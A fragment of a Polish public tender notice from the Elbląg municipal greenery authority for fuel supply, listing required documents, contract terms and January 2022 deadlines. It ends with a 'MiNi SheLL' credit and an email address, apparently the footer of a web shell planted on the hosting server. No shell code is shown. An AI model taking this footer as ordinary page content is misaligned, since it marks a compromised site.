class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	dokument potwierdzający posiadanie uprawnień do prowadzenia działalności gospodarczej, o której mowa w art. 32 ust 1 pkt 4 ustawy Prawo energetyczne z dnia z 10 kwietnia 1997 (tj. Dz. U. z 2021 r., poz. 716) tj. <br/>aktualna koncesja na prowadzenie działalności gospodarczej w zakresie obrotu paliwami.<br/>1)	dokument potwierdzający posiadanie uprawnień do prowadzenia działalności gospodarczej, o której mowa w art. 32 ust 1 pkt 4 ustawy Prawo energetyczne z dnia z 10 kwietnia 1997 (tj. Dz. U. z 2021 r., poz. 716) tj. <br/>aktualna koncesja na prowadzenie działalności gospodarczej w zakresie obrotu paliwami.<br/>2)	dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną ubezpieczenia 200 000,00 zł.<br/>3)	Wykaz co najmniej 1 stacji paliw w promieniu do 6 km od siedziby Zamawiającego w Elblągu, przy ulicy Krakusa 13-16, na której Zamawiający będzie tankował pojazdy oraz pobierał paliwa do sprzętów;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 10.	Strony uzgadniają, iż istnieje możliwość zmiany umowy w zakresie wysokości wynagrodzenia określonego w § 6 ust. 1,2,3, w sytuacji zmiany wysokości należnego podatku. Zmiana ta będzie wymagała formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP (na adres Elektronicznej Skrzynki Podawczej (ESP) ZARZĄDU ZIELENI MIEJSKIEJ W ELBLĄGU /ZZM_Elblag/SkrytkaESP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-13 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com